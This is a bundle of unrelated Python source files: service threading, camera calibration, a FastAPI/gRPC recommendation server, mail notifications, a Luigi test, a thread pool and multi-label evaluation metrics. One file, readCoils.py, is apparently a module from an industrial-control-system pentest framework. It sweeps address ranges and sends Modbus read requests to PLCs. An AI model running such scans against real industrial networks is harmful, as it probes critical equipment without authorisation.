trd = threading.Thread(target=target)
ServiceManager.threads += [{
'target': target,
'trd': trd,
}]
return
# ------------------------------------------------------------------
@classmethod
def get_threads(self):
return ServiceManager.threads
# ------------------------------------------------------------------
@classmethod
def run_threads(self):
"""run all threads and block untill they all finish
"""
for thread in ServiceManager.threads:
thread['trd'].start()
for thread in ServiceManager.threads:
thread['trd'].join()
return
# ------------------------------------------------------------------
def has_active_instance(self):
"""will return None is there is no active instance, otherwise, will return
the initialisation state
"""
return self.redis.get(self.active_instance_name)
# ------------------------------------------------------------------
def set_active_instance(self, has_init, expire_sec):
self.redis.set(
name=self.active_instance_name,
data=has_init,
expire_sec=int(expire_sec),
)
return
# ------------------------------------------------------------------
@classmethod
def unset_active_instance(self, parent, service_name):
active_instance_name = ServiceManager.get_active_name(service_name=service_name)
if parent.redis.exists(active_instance_name):
parent.log.info([
['r', ' - unset_active_instance '],
['y', active_instance_name],
['r', ' ...'],
])
parent.redis.delete(name=active_instance_name)
return
# ------------------------------------------------------------------
def init_active_instance(self):
if self.has_active_instance() is not None:
# sleep for a bit
sleep(self.active_expire_sec)
# try again for n_sec_try
n_sec_try = 3
for _ in range(n_sec_try):
if self.has_active_instance() is None:
break
sleep(1)
# if the instance is still locked, something must be wrong
if self.has_active_instance() is not None:
raise Exception(
'Can not instantiate an active instance more than once...',
self.active_instance_name,
)
# register the heartbeat thread
self.add_thread(target=self.loop_active_heartbeat)
return
# ------------------------------------------------------------------
def loop_active_heartbeat(self):
"""heartbeat loop running in its own thread, updating the expiration
of the active instance
"""
self.log.info([
['g', ' - starting loop_active_heartbeat '],
['y', self.active_instance_name],
['g', ' ...'],
])
# set the active instance once, in order to satisfy can_loop()
self.set_active_instance(has_init=False, expire_sec=self.active_expire_sec)
while self.can_loop():
self.set_active_instance(
has_init=True,
expire_sec=self.active_expire_sec,
)
sleep(self.loop_active_expire_sec)
self.log.info([
['c', ' - ending loop_active_heartbeat '],
['y', self.active_instance_name],
['c', ' ...'],
])
return
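# A rough usage sketch (hypothetical; assumes a subclass that provides the
# `redis`, `log` and `interrupt_sig` attributes referenced above):
#
#     manager = MyService('my_service')           # derives from ServiceManager
#     manager.init_active_instance()              # registers the heartbeat thread
#     manager.add_thread(target=manager.my_loop)  # worker loops check can_loop()
#     manager.run_threads()                       # blocks until all threads finish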
|
checkerpoint_correspondence_generator.py
|
import numpy as np
import pickle
import cv2
import glob
import os
import argparse
from multiprocessing import Process, Manager
def parallization_function(args, i, filename, global_objpts, global_imgpts, global_mark):
ncols = args.nsquare_x - 1
nrows = args.nsquare_y - 1
# termination criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objpts = np.zeros((ncols * nrows, 3), np.float32)
objpts[:, :2] = np.mgrid[0:ncols, 0:nrows].T.reshape(-1, 2)*10
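# the factor of 10 presumably encodes the physical square size (e.g. 10 mm
# squares); this is an assumption, adjust it to match the real checkerboard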
print("{0}) Reading {1}".format(i + 1, filename))
image = cv2.imread(filename)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
height, width = gray.shape
# if(height>width):
# gray = cv2.rotate(gray, cv2.ROTATE_90_CLOCKWISE)
# Find the chess board corners
ret, corners = cv2.findChessboardCorners(gray, (ncols, nrows), None)
# If found, add object points, image points (after refining them)
if ret:
global_objpts[i] = (objpts)
refined_corners = cv2.cornerSubPix(gray, corners, (11, 11), (-1, -1), criteria)
global_imgpts[i] = refined_corners
global_mark[i] = True
if args.visualize:
# Draw and display the corners
scale = 1.0
draw = cv2.resize(image, None, fx=scale, fy=scale)
draw = cv2.drawChessboardCorners(draw, (ncols, nrows), refined_corners * scale, ret)
cv2.namedWindow(filename, cv2.WINDOW_NORMAL)
cv2.imshow(filename, draw)
cv2.waitKey(0)
print("{0}) Completed {1}".format(i + 1, filename))
def process(args):
# Arrays to store object points and image points from all the images.
objpts_list = list() # 3d point in real world space
imgpts_list = list() # 2d points in image plane.
images = glob.glob(os.path.join(args.images_dir, "*.jpg"))
with Manager() as manager:
global_objpts = manager.list(range(len(images))) # <-- can be shared between processes.
global_imgpts = manager.list(range(len(images))) # <-- can be shared between processes.
global_mark = manager.list([False for _ in range(len(images))]) # <-- can be shared between processes.
processes = []
for i, filename in enumerate(images):
p = Process(target=parallization_function, args=(args, i, filename,global_objpts, global_imgpts, global_mark)) # Passing the list
p.start()
processes.append(p)
for p in processes:
p.join()
for ind in range(len(images)):
if global_mark[ind]:
objpts_list.append(global_objpts[ind])
imgpts_list.append(global_imgpts[ind])
if args.visualize:
cv2.destroyAllWindows()
for i, filename in enumerate(images):
print("{0}) Reading {1}".format(i + 1, filename))
image = cv2.imread(filename)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
if args.output_dir is not None:
with open(os.path.join(args.output_dir, "data_rotation_fixed_vert_temp.pkl"), "wb") as f:
data = (objpts_list, imgpts_list, gray.shape)
pickle.dump(data, f)
# cv2.calibrateCamera expects the image size as (width, height), while gray.shape is (height, width)
ret, camera_matrix, dist_coeffs, rvecs, tvecs = cv2.calibrateCamera(objpts_list, imgpts_list, gray.shape[::-1], None, None)
print("camera matrix: {}".format(camera_matrix))
print("distortion coefficients: {}".format(dist_coeffs))
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--images_dir',
type=str,
required=True,
help="Directory contains images.")
parser.add_argument(
'--output_dir',
type=str,
default=None,
help="Directory to save results.")
parser.add_argument(
'--nsquare_x',
type=int,
default=7,
help="Number of squares in x direction.")
parser.add_argument(
'--nsquare_y',
type=int,
default=10,
help="Number of squares in y direction.")
parser.add_argument(
'--visualize',
action='store_true',  # argparse's type=bool treats any non-empty string as True, so use a flag instead
help="Visualize detected checkerboard corners.")
args = parser.parse_args()
process(args)
if __name__ == '__main__':
main()
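# Example invocation (paths and board dimensions are illustrative only):
#     python checkerpoint_correspondence_generator.py --images_dir ./calib_images \
#         --output_dir ./out --nsquare_x 7 --nsquare_y 10 --visualize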
|
server.py
|
import os
import logging
import json
import uvicorn
from fastapi import FastAPI
from pydantic import BaseModel
import grpc
from google.protobuf import any_pb2
import sys
import time
from threading import Thread
import redis
import cache
import service_pb2
import service_pb2_grpc
class ProcessItem(BaseModel):
user_id: str
clicked_item_ids: list = []
app = FastAPI()
# Mandatory variables in environment
MANDATORY_ENV_VARS = {
'REDIS_HOST' : 'localhost',
'REDIS_PORT' : 6379,
'PORTRAIT_PORT': 5300
}
sleep_interval = 10 #second
pickle_type = 'inverted-list'
action_model_type = 'action-model'
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.start()
return wrapper
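# xasync is a small fire-and-forget decorator: calling a decorated function
# starts it on a background thread and returns immediately (no return value is
# propagated), which is how the stream readers below run concurrently.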
@app.get('/portrait/status', tags=["monitoring"])
def status():
logging.info('Collecting status information from server & plugin...')
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.Status(service_pb2.google_dot_protobuf_dot_empty__pb2.Empty())
statusAny = any_pb2.Any()
response.status.Unpack(statusAny)
pStatus = json.loads(statusAny.value.decode('utf-8'))
return {
'env': MANDATORY_ENV_VARS,
'redis': rCache.connection_status(),
'plugin_status': pStatus
}
@app.get('/ping', tags=["monitoring"])
def ping():
logging.info('Processing default request')
return {
"result": "pong"
}
@app.get('/portrait/userid/{user_id}', tags=["portrait"])
async def get_portrait(user_id: str):
logging.info('Searching %s - user portrait from cache ...', user_id)
# Get data from plugin service
gPortraitRequest = service_pb2.GetPortraitRequest(apiVersion='v1',
metadata='Portrait', type='GetPortrait', userId=user_id)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.GetPortrait(gPortraitRequest)
results = any_pb2.Any()
response.results.Unpack(results)
# json.loads accepts bytes directly; the 'encoding' keyword was removed in Python 3.9
resultJson = json.loads(results.value)
return {
'code': response.code,
'description': response.description,
'results': resultJson
}
@app.post('/portrait/process', tags=["portrait_to_plugin"])
def update_portrait(processItem: ProcessItem):
logging.info('Start update_portrait() ...')
user_id = processItem.user_id
clicked_item_ids = processItem.clicked_item_ids
logging.info('user_id -> %s', user_id)
logging.info('clicked_item_ids -> %s', clicked_item_ids)
reqDicts = any_pb2.Any()
reqDicts.value = json.dumps({
'user_id': user_id,
'clicked_item_ids': clicked_item_ids
}).encode('utf-8')
logging.info('Invoke plugin to update portrait...')
updateRequest = service_pb2.UpdatePortraitRequest(apiVersion='v1',
metadata='Portrait', type='UpdatePortrait')
updateRequest.dicts.Pack(reqDicts)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.UpdatePortrait(updateRequest)
results = any_pb2.Any()
response.results.Unpack(results)
resultJson = json.loads(results.value)
return {
'code': response.code,
'description': response.description,
'results': resultJson
}
def read_stream_messages():
logging.info('read_stream_messages start')
read_pickle_message()
read_action_model_message()
@xasync
def read_action_model_message():
logging.info('read_action_model_message start')
# Read existed stream message
stream_message = rCache.read_stream_message(action_model_type)
if stream_message:
logging.info("Handle existed stream action_model_type message")
handle_stream_message(stream_message)
while True:
logging.info('wait for reading action_model_type message')
try:
stream_message = rCache.read_stream_message_block(action_model_type)
if stream_message:
handle_stream_message(stream_message)
except redis.ConnectionError:
localtime = time.asctime( time.localtime(time.time()))
logging.info('get ConnectionError, time: {}'.format(localtime))
time.sleep( sleep_interval )
@xasync
def read_pickle_message():
logging.info('read_pickle_message start')
# Read existed stream message
stream_message = rCache.read_stream_message(pickle_type)
if stream_message:
logging.info("Handle existed stream pickle_type message")
handle_stream_message(stream_message)
while True:
logging.info('wait for reading pickle_type message')
localtime = time.asctime( time.localtime(time.time()))
logging.info('start read stream: time: {}'.format(localtime))
try:
stream_message = rCache.read_stream_message_block(pickle_type)
if stream_message:
handle_stream_message(stream_message)
except redis.ConnectionError:
localtime = time.asctime( time.localtime(time.time()))
logging.info('get ConnectionError, time: {}'.format(localtime))
time.sleep( sleep_interval )
def handle_stream_message(stream_message):
logging.info('get stream message from {}'.format(stream_message))
file_type, file_path, file_list = parse_stream_message(stream_message)
logging.info('start reload data process in handle_stream_message')
logging.info('file_type {}'.format(file_type))
logging.info('file_path {}'.format(file_path))
logging.info('file_list {}'.format(file_list))
reqDicts = any_pb2.Any()
reqDicts.value = json.dumps({
'file_type': file_type,
'file_list': file_list
}).encode('utf-8')
reloadRequest = service_pb2.ReloadRequest()
reloadRequest.dicts.Pack(reqDicts)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.Reload(reloadRequest)
if response.code == 0:
logging.info('reload plugin succeeded')
else:
logging.info('reload plugin failed, description: {}'.format(response.description))
def parse_stream_message(stream_message):
for stream_name, message in stream_message:
for message_id, value in message:
decode_value = convert(value)
file_type = decode_value['file_type']
file_path = decode_value['file_path']
file_list = decode_value['file_list']
return file_type, file_path, file_list
# convert stream data to str
def convert(data):
if isinstance(data, bytes):
return data.decode('ascii')
elif isinstance(data, dict):
return dict(map(convert, data.items()))
elif isinstance(data, tuple):
return map(convert, data)
else:
return data
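# For example, a raw Redis stream entry such as
#     {b'file_type': b'inverted-list', b'file_path': b'/tmp', b'file_list': b'[]'}
# is converted to
#     {'file_type': 'inverted-list', 'file_path': '/tmp', 'file_list': '[]'}
# (values are illustrative; only the bytes-to-str decoding is the point here)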
def check_plugin_status():
logging.info('check plugin status')
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.Status(service_pb2.google_dot_protobuf_dot_empty__pb2.Empty())
if response.code == 0:
logging.info('plugin startup succeed')
return True
else:
logging.info('plugin startup failed')
return False
def wait_for_plugin_service():
while True:
if check_plugin_status():
return
else:
logging.info('wait for plugin startup')
time.sleep( sleep_interval )
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error("Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var]=os.environ.get(var)
# Initial redis connection
global rCache
rCache = cache.RedisCache(host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
wait_for_plugin_service()
logging.info('portrait start!')
read_stream_messages()
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
uvicorn.run(app, host="0.0.0.0", port=int(MANDATORY_ENV_VARS['PORTRAIT_PORT']))
|
message.py
|
from time import sleep
from marrow.mailer import Mailer
from sqlalchemy import Column, Unicode, UnicodeText, Integer
from config import admin_mail
import secret
from models.base_model import SQLMixin, db
from models.user import User
def configured_mailer():
config = {
# 'manager.use': 'futures',
'transport.debug': True,
'transport.timeout': 1,
'transport.use': 'smtp',
'transport.host': 'smtp.exmail.qq.com',
'transport.port': 465,
'transport.tls': 'ssl',
'transport.username': admin_mail,
'transport.password': secret.mail_password,
}
m = Mailer(config)
m.start()
return m
mailer = configured_mailer()
def send_mail(subject, author, to, content):
# delay test
# sleep(30)
m = mailer.new(
subject=subject,
author=author,
to=to,
)
m.plain = content
mailer.send(m)
class Messages(SQLMixin, db.Model):
title = Column(Unicode(50), nullable=False)
content = Column(UnicodeText, nullable=False)
sender_id = Column(Integer, nullable=False)
receiver_id = Column(Integer, nullable=False)
@staticmethod
def send(title: str, content: str, sender_id: int, receiver_id: int):
form = dict(
title=title,
content=content,
sender_id=sender_id,
receiver_id=receiver_id
)
Messages.new(form)
receiver: User = User.one(id=receiver_id)
send_mail(
subject=title,
author=admin_mail,
to=receiver.email,
content='Site message notification:\n {}'.format(content),
)
# import threading
# form = dict(
# subject=form['title'],
# author=admin_mail,
# to=receiver.email,
# plain=form['content'],
# )
# t = threading.Thread(target=send_mail, kwargs=form)
# t.start()
# send_async.delay(
# subject=form['title'],
# author=admin_mail,
# to=receiver.email,
# plain=form['content']
# )
|
simulate_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest
import luigi
from luigi.contrib.simulate import RunAnywayTarget
from multiprocessing import Process
import os
import tempfile
def temp_dir():
return os.path.join(tempfile.gettempdir(), 'luigi-simulate')
def is_writable():
d = temp_dir()
fn = os.path.join(d, 'luigi-simulate-write-test')
exists = True
try:
try:
os.makedirs(d)
except OSError:
pass
open(fn, 'w').close()
os.remove(fn)
except BaseException:
exists = False
return unittest.skipIf(not exists, 'Can\'t write to temporary directory')
class TaskA(luigi.Task):
i = luigi.IntParameter(default=0)
def output(self):
return RunAnywayTarget(self)
def run(self):
fn = os.path.join(temp_dir(), 'luigi-simulate-test.tmp')
try:
os.makedirs(os.path.dirname(fn))
except OSError:
pass
with open(fn, 'a') as f:
f.write('{0}={1}\n'.format(self.__class__.__name__, self.i))
self.output().done()
class TaskB(TaskA):
def requires(self):
return TaskA(i=10)
class TaskC(TaskA):
def requires(self):
return TaskA(i=5)
class TaskD(TaskA):
def requires(self):
return [TaskB(), TaskC(), TaskA(i=20)]
class TaskWrap(luigi.WrapperTask):
def requires(self):
return [TaskA(), TaskD()]
def reset():
# Force tasks to be executed again (because multiple pipelines are executed inside of the same process)
t = TaskA().output()
with t.unique.get_lock():
t.unique.value = 0
class RunAnywayTargetTest(unittest.TestCase):
@is_writable()
def test_output(self):
reset()
fn = os.path.join(temp_dir(), 'luigi-simulate-test.tmp')
luigi.build([TaskWrap()], local_scheduler=True)
with open(fn, 'r') as f:
data = f.read().strip().split('\n')
data.sort()
reference = ['TaskA=0', 'TaskA=10', 'TaskA=20', 'TaskA=5', 'TaskB=0', 'TaskC=0', 'TaskD=0']
reference.sort()
os.remove(fn)
self.assertEqual(data, reference)
@is_writable()
def test_output_again(self):
# Running the test in another process because the PID is used to determine if the target exists
p = Process(target=self.test_output)
p.start()
p.join()
|
readCoils.py
|
from System.Core.Global import *
from System.Core.Colors import *
from System.Core.Modbus import *
import ipcalc
class Module:
info = {
'Name': 'Read Coils Function',
'Author': ['@enddo'],
'Description': ("Fuzzing Read Coils Function"),
}
options = {
'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'],
'RPORT' :[502 ,False ,'The port number for modbus protocol'],
'UID' :[None ,True ,'Modbus Slave UID.'],
'StartAddr' :['0x0000' ,True ,'Start Address.'],
'Quantity' :['0x0001' ,True ,'Quantity of coils to read.'],
'Threads' :[1 ,False ,'The number of concurrent threads'],
'Output' :[True ,False ,'The stdout save in output directory']
}
output = ''
def exploit(self):
moduleName = self.info['Name']
print(bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start')
ips = list()
for ip in ipcalc.Network(self.options['RHOSTS'][0]):
ips.append(str(ip))
while ips:
for i in range(int(self.options['Threads'][0])):
if len(ips) > 0:
thread = threading.Thread(target=self.do, args=(ips.pop(0),))
thread.start()
THREADS.append(thread)
else:
break
for thread in THREADS:
thread.join()
if self.options['Output'][0]:
open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/', '_') + '.txt', 'a').write('='*30 + '\n' + self.output + '\n\n')
self.output = ''
def printLine(self, str, color):
self.output += str + '\n'
if str.find('[+]') != -1:
print(str.replace('[+]', color + '[+]' + bcolors.ENDC))
elif str.find('[-]') != -1:
print(str.replace('[-]', color + '[-]' + bcolors.ENDC))
else:
print(str)
def do(self, ip):
c = connectToTarget(ip, self.options['RPORT'][0])
if c is None:
self.printLine('[-] Modbus is not running on : ' + ip, bcolors.WARNING)
return None
self.printLine('[+] Connecting to ' + ip, bcolors.OKGREEN)
ans = c.sr1(ModbusADU(transId=getTransId(), unitId=int(self.options['UID'][0]))/ModbusPDU01_Read_Coils(startAddr=int(self.options['StartAddr'][0], 16), quantity=int(self.options['Quantity'][0], 16)), timeout=timeout, verbose=0)
self.printLine('[+] Received response!', bcolors.OKGREEN)
# ans = mb.ModbusADUResponse(ans)
# ans = ModbusADU_Answer(ans)
# ans.show()
# TODO Show packet
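# Rough usage sketch (hypothetical values; option names are the keys defined in
# self.options above):
#
#     module = Module()
#     module.options['RHOSTS'][0] = '192.168.1.0/24'
#     module.options['UID'][0] = 1
#     module.exploit()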
|
threadpool.py
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Cached thread pool, inspired from Pelix/iPOPO Thread Pool
:author: Thomas Calmant
:copyright: Copyright 2015, isandlaTech
:license: Apache License 2.0
:version: 0.2.4
..
Copyright 2015 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Documentation strings format
__docformat__ = "restructuredtext en"
# Module version
__version_info__ = (0, 2, 4)
__version__ = ".".join(str(x) for x in __version_info__)
# ------------------------------------------------------------------------------
# Standard library
import logging
import threading
try:
# Python 3
# pylint: disable=F0401
import queue
except ImportError:
# Python 2
# pylint: disable=F0401
import Queue as queue
# ------------------------------------------------------------------------------
class EventData(object):
"""
A threading event with some associated data
"""
def __init__(self):
"""
Sets up the event
"""
self.__event = threading.Event()
self.__data = None
self.__exception = None
@property
def data(self):
"""
Returns the associated value
"""
return self.__data
@property
def exception(self):
"""
Returns the exception used to stop the wait() method
"""
return self.__exception
def clear(self):
"""
Clears the event
"""
self.__event.clear()
self.__data = None
self.__exception = None
def is_set(self):
"""
Checks if the event is set
"""
return self.__event.is_set()
def set(self, data=None):
"""
Sets the event
"""
self.__data = data
self.__exception = None
self.__event.set()
def raise_exception(self, exception):
"""
Raises an exception in wait()
:param exception: An Exception object
"""
self.__data = None
self.__exception = exception
self.__event.set()
def wait(self, timeout=None):
"""
Waits for the event or for the timeout
:param timeout: Wait timeout (in seconds)
:return: True if the event has been set, else False
"""
# The 'or' part is for Python 2.6
result = self.__event.wait(timeout) or self.__event.is_set()
# pylint: disable=E0702
# Pylint seems to miss the "is None" check below
if self.__exception is None:
return result
else:
raise self.__exception
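# Illustrative behaviour of EventData (an added sketch, not part of the
# original module):
#
#   event = EventData()
#   event.set("payload")
#   event.wait(1)                    # -> True, and event.data == "payload"
#   event.clear()
#   event.raise_exception(IOError()) # a later event.wait() re-raises the IOError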
class FutureResult(object):
"""
An object to wait for the result of a threaded execution
"""
def __init__(self, logger=None):
"""
Sets up the FutureResult object
:param logger: The Logger to use in case of error (optional)
"""
self._logger = logger or logging.getLogger(__name__)
self._done_event = EventData()
self.__callback = None
self.__extra = None
def __notify(self):
"""
Notify the given callback about the result of the execution
"""
if self.__callback is not None:
try:
self.__callback(self._done_event.data,
self._done_event.exception,
self.__extra)
except Exception as ex:
self._logger.exception("Error calling back method: %s", ex)
def set_callback(self, method, extra=None):
"""
Sets a callback method, called once the result has been computed or in
case of exception.
The callback method must have the following signature:
``callback(result, exception, extra)``.
:param method: The method to call back in the end of the execution
:param extra: Extra parameter to be given to the callback method
"""
self.__callback = method
self.__extra = extra
if self._done_event.is_set():
# The execution has already finished
self.__notify()
def execute(self, method, args, kwargs):
"""
Executes the given method and stores its result.
The result is considered "done" even if the method raises an exception
:param method: The method to execute
:param args: Method positional arguments
:param kwargs: Method keyword arguments
:raise Exception: The exception raised by the method
"""
# Normalize arguments
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
# Call the method
result = method(*args, **kwargs)
except Exception as ex:
# Something went wrong: propagate to the event and to the caller
self._done_event.raise_exception(ex)
raise
else:
# Store the result
self._done_event.set(result)
finally:
# In any case: notify the call back (if any)
self.__notify()
def done(self):
"""
Returns True if the job has finished, else False
"""
return self._done_event.is_set()
def result(self, timeout=None):
"""
Waits up to timeout for the result of the threaded job.
Returns immediately the result if the job has already been done.
:param timeout: The maximum time to wait for a result (in seconds)
:raise OSError: The timeout was reached before the job finished
:raise Exception: The exception encountered during the call, if any
"""
if self._done_event.wait(timeout):
return self._done_event.data
else:
raise OSError("Timeout raised")
# ------------------------------------------------------------------------------
class ThreadPool(object):
"""
Executes the tasks stored in a FIFO in a thread pool
"""
def __init__(self, max_threads, min_threads=1, queue_size=0, timeout=60,
logname=None):
"""
Sets up the thread pool.
Threads are kept alive 60 seconds (timeout argument).
:param max_threads: Maximum size of the thread pool
:param min_threads: Minimum size of the thread pool
:param queue_size: Size of the task queue (0 for infinite)
:param timeout: Queue timeout (in seconds, 60s by default)
:param logname: Name of the logger
:raise ValueError: Invalid number of threads
"""
# Validate parameters
try:
max_threads = int(max_threads)
if max_threads < 1:
raise ValueError("Pool size must be greater than 0")
except (TypeError, ValueError) as ex:
raise ValueError("Invalid pool size: {0}".format(ex))
try:
min_threads = int(min_threads)
if min_threads < 0:
min_threads = 0
elif min_threads > max_threads:
min_threads = max_threads
except (TypeError, ValueError) as ex:
raise ValueError("Invalid pool size: {0}".format(ex))
# The logger
self._logger = logging.getLogger(logname or __name__)
# The loop control event
self._done_event = threading.Event()
self._done_event.set()
# The task queue
try:
queue_size = int(queue_size)
except (TypeError, ValueError):
# Not a valid integer
queue_size = 0
self._queue = queue.Queue(queue_size)
self._timeout = timeout
self.__lock = threading.RLock()
# The thread pool
self._min_threads = min_threads
self._max_threads = max_threads
self._threads = []
# Thread count
self._thread_id = 0
# Current number of threads, active and alive
self.__nb_threads = 0
self.__nb_active_threads = 0
def start(self):
"""
Starts the thread pool. Does nothing if the pool is already started.
"""
if not self._done_event.is_set():
# Stop event not set: we're running
return
# Clear the stop event
self._done_event.clear()
# Compute the number of threads to start to handle pending tasks
nb_pending_tasks = self._queue.qsize()
if nb_pending_tasks > self._max_threads:
nb_threads = self._max_threads
elif nb_pending_tasks < self._min_threads:
nb_threads = self._min_threads
else:
nb_threads = nb_pending_tasks
# Create the threads
for _ in range(nb_threads):
self.__start_thread()
def __start_thread(self):
"""
Starts a new thread, if possible
"""
with self.__lock:
if self.__nb_threads >= self._max_threads:
# Can't create more threads
return False
if self._done_event.is_set():
# We're stopped: do nothing
return False
# Prepare thread and start it
name = "{0}-{1}".format(self._logger.name, self._thread_id)
self._thread_id += 1
thread = threading.Thread(target=self.__run, name=name)
thread.daemon = True
self._threads.append(thread)
thread.start()
return True
def stop(self):
"""
Stops the thread pool. Does nothing if the pool is already stopped.
"""
if self._done_event.is_set():
# Stop event set: we're stopped
return
# Set the stop event
self._done_event.set()
with self.__lock:
# Add something in the queue (to unlock the join())
try:
for _ in self._threads:
self._queue.put(self._done_event, True, self._timeout)
except queue.Full:
# There is already something in the queue
pass
# Copy the list of threads to wait for
threads = self._threads[:]
# Join threads outside the lock
for thread in threads:
while thread.is_alive():
# Wait 3 seconds
thread.join(3)
if thread.is_alive():
# Thread is still alive: something might be wrong
self._logger.warning("Thread %s is still alive...",
thread.name)
# Clear storage
del self._threads[:]
self.clear()
def enqueue(self, method, *args, **kwargs):
"""
Queues a task in the pool
:param method: Method to call
:return: A FutureResult object, to get the result of the task
:raise ValueError: Invalid method
:raise Full: The task queue is full
"""
if not hasattr(method, '__call__'):
raise ValueError("{0} has no __call__ member."
.format(method.__name__))
# Prepare the future result object
future = FutureResult(self._logger)
# Use a lock, as we might be "resetting" the queue
with self.__lock:
# Add the task to the queue
self._queue.put((method, args, kwargs, future), True,
self._timeout)
if self.__nb_active_threads == self.__nb_threads:
# All threads are taken: start a new one
self.__start_thread()
return future
def clear(self):
"""
Empties the current queue content.
Returns once the queue has been emptied.
"""
with self.__lock:
# Empty the current queue
try:
while True:
self._queue.get_nowait()
self._queue.task_done()
except queue.Empty:
# Queue is now empty
pass
# Wait for the tasks currently executed
self.join()
def join(self, timeout=None):
"""
Waits for all the tasks to be executed
:param timeout: Maximum time to wait (in seconds)
:return: True if the queue has been emptied, else False
"""
if self._queue.empty():
# Nothing to wait for...
return True
elif timeout is None:
# Use the original join
self._queue.join()
return True
else:
# Wait for the condition
with self._queue.all_tasks_done:
self._queue.all_tasks_done.wait(timeout)
return not bool(self._queue.unfinished_tasks)
def __run(self):
"""
The main loop
"""
with self.__lock:
self.__nb_threads += 1
while not self._done_event.is_set():
try:
# Wait for an action (blocking)
task = self._queue.get(True, self._timeout)
if task is self._done_event:
# Stop event in the queue: get out
self._queue.task_done()
with self.__lock:
self.__nb_threads -= 1
return
except queue.Empty:
# Nothing to do yet
pass
else:
with self.__lock:
self.__nb_active_threads += 1
# Extract elements
method, args, kwargs, future = task
try:
# Call the method
future.execute(method, args, kwargs)
except Exception as ex:
self._logger.exception("Error executing %s: %s",
method.__name__, ex)
finally:
# Mark the action as executed
self._queue.task_done()
# Thread is not active anymore
self.__nb_active_threads -= 1
# Clean up thread if necessary
with self.__lock:
if self.__nb_threads > self._min_threads:
# No more work for this thread, and we're above the
# minimum number of threads: stop this one
self.__nb_threads -= 1
return
with self.__lock:
# Thread stops
self.__nb_threads -= 1
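# Minimal usage sketch (an illustrative addition, not part of the original
# module). It exercises the public API defined above: start(), enqueue(),
# FutureResult.result() and stop().
if __name__ == '__main__':
    def _square(value):
        # trivial task used only for the demonstration
        return value * value

    pool = ThreadPool(max_threads=4, min_threads=1)
    pool.start()
    futures = [pool.enqueue(_square, i) for i in range(8)]
    print([future.result(timeout=5) for future in futures])
    pool.stop()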
|
evals.py
|
import numpy
import scipy.sparse as sp
import logging
from six.moves import xrange
from collections import OrderedDict
import sys
import pdb
from sklearn import metrics
from threading import Lock
from threading import Thread
import torch
import math
from pdb import set_trace as stop
import os
import pandas as pd
# import pylab as pl
from sklearn.metrics import roc_curve, auc
FORMAT = '[%(asctime)s] %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
LOGGER = logging.getLogger(__name__)
def list2sparse(A, n_labels=None):
if n_labels is None:
n_labels_ = 0
for a in A:
if n_labels_ < numpy.max(a):
n_labels_ = numpy.max(a)
n_labels = n_labels_ + 1  # labels are zero-based indices, so max(label) + 1 columns are needed
n_samples = len(A)
mat = sp.dok_matrix((n_samples, n_labels))
for idx in xrange(n_samples):
for item in A[idx]:
mat[idx, item] = 1
return mat.tocsr()
def is_sparse(matrix):
return sp.issparse(matrix)
def is_binary_matrix(matrix):
return numpy.all(numpy.logical_xor(matrix != 1, matrix != 0))
def sparse2dense(sparse_matrix):
""" convert a sparse matrix into a dense matrix of 0 or 1.
"""
assert sp.issparse(sparse_matrix)
return numpy.asarray(sparse_matrix.toarray())
def prepare_evaluation(targets, preds):
if is_sparse(targets):
targets = sparse2dense(targets)
if is_sparse(preds):
preds = sparse2dense(preds)
assert numpy.array_equal(targets.shape, preds.shape)
assert is_binary_matrix(targets)
assert is_binary_matrix(preds)
return (targets, preds)
def subset_accuracy(true_targets, predictions, per_sample=False, axis=0):
# print(true_targets.shape)
# print(predictions.shape)
result = numpy.all(true_targets == predictions, axis=axis)
if not per_sample:
result = numpy.mean(result)
return result
def hamming_loss(true_targets, predictions, per_sample=False, axis=0):
result = numpy.mean(numpy.logical_xor(true_targets, predictions),
axis=axis)
if not per_sample:
result = numpy.mean(result)
return result
def compute_tp_fp_fn(true_targets, predictions, axis=0):
# axis: axis for instance
tp = numpy.sum(true_targets * predictions, axis=axis).astype('float32')
